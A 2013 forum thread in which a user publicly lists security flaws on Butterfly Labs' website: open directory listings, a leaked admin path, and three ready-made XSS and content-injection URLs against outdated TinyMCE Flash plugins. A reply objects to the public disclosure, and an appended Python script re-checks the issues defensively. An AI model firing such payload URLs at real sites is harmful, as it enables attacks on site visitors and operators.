
Topic: BFL's site is incredibly amateur... - page 2. (Read 2854 times)

sr. member
Activity: 287
Merit: 250
May 02, 2013, 10:12:58 PM
#2
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
sr. member
Activity: 350
Merit: 250
May 02, 2013, 09:24:41 PM
#1
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and its swfupload XSS. There are 2 separate XSSes here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done ;)
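The two classes of issue in the post above (directory listing enabled on a path, and a known-stale TinyMCE plugin file still being served) are easy to re-check mechanically, which is what the "EDIT" follow-ups amount to. The following is an added example, not code from the post or from BFL: a small Python checker that takes a base URL and a fetch function, flags paths whose 200 response carries auto-index markers, and flags stale plugin files that still return 200. The paths are the ones named in the post; the index-marker regexes are a heuristic assumption (Apache mod_autoindex, nginx autoindex and IIS output), and the HTTP responses below are constructed so the script runs offline. Swap in `live_fetch` to run it against a host you are authorized to test.

```python
"""Re-check directory listing and stale plugin files.

Added example (not the post's code). Sample responses are constructed inline
so the checker runs with no network access; `live_fetch` is the real fetcher.
"""
import re
from typing import Callable, Dict, Tuple
from urllib.parse import urljoin, urlparse

# Paths named in the post. The first group should never return an
# auto-generated index; the second group should no longer be served at all.
LISTING_PATHS = ["/upload/", "/images/", "/images/users/"]
STALE_FILES = [
    "/js/tiny_mce/plugins/archiv/swf/swfupload.swf",
    "/js/tiny_mce/plugins/media/moxieplayer.swf",
]

# Heuristic markers of auto-generated indexes (assumption: Apache/nginx/IIS).
LISTING_MARKERS = [
    re.compile(r"<title>\s*Index of\s*/", re.I),        # Apache, nginx
    re.compile(r"<h1>\s*Index of\s*/", re.I),           # Apache, nginx
    re.compile(r">\s*(\[To\s+)?Parent Directory", re.I),  # Apache, IIS
    re.compile(r"Directory Listing\s*--\s*/", re.I),    # IIS title
]

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status code, body)


def looks_like_listing(status: int, body: str) -> bool:
    """A 200 whose body carries index markers is an auto-generated listing."""
    if status != 200:
        return False
    return any(m.search(body) for m in LISTING_MARKERS)


def check_site(base: str, fetch: Fetcher) -> Dict[str, str]:
    """Return {path: finding} for every path that is still a problem."""
    findings: Dict[str, str] = {}
    for path in LISTING_PATHS:
        status, body = fetch(urljoin(base, path))
        if looks_like_listing(status, body):
            findings[path] = "directory listing enabled"
    for path in STALE_FILES:
        status, _ = fetch(urljoin(base, path))
        if status == 200:  # file still served; presence alone is the finding
            findings[path] = "stale plugin file still served"
    return findings


# Constructed responses mimicking the state the post describes.
APACHE_INDEX = (
    "<html><head><title>Index of /upload</title></head><body>"
    '<h1>Index of /upload</h1><a href="../">Parent Directory</a></body></html>'
)
NORMAL_PAGE = "<html><head><title>Butterfly Labs</title></head><body>...</body></html>"
CONSTRUCTED_RESPONSES = {
    "/upload/": (200, APACHE_INDEX),
    "/images/": (200, APACHE_INDEX),
    "/images/users/": (200, APACHE_INDEX),
    "/js/tiny_mce/plugins/archiv/swf/swfupload.swf": (200, "FWS..."),  # fake SWF body
    "/js/tiny_mce/plugins/media/moxieplayer.swf": (200, "CWS..."),     # fake SWF body
}


def offline_fetch(url: str) -> Tuple[int, str]:
    """Serve the constructed responses; anything else is a plain 404."""
    return CONSTRUCTED_RESPONSES.get(urlparse(url).path, (404, NORMAL_PAGE))


def live_fetch(url: str) -> Tuple[int, str]:
    """Real fetcher for a host you are authorized to test."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


if __name__ == "__main__":
    for path, finding in check_site("http://www.butterflylabs.com", offline_fetch).items():
        print(f"{finding}: {path}")
```

Server-side, the listing half of this goes away with `Options -Indexes` (Apache) or `autoindex off` (nginx); the stale-file half only goes away by updating or removing the plugin directories, since the SWF files are reachable regardless of whether the editor still references them.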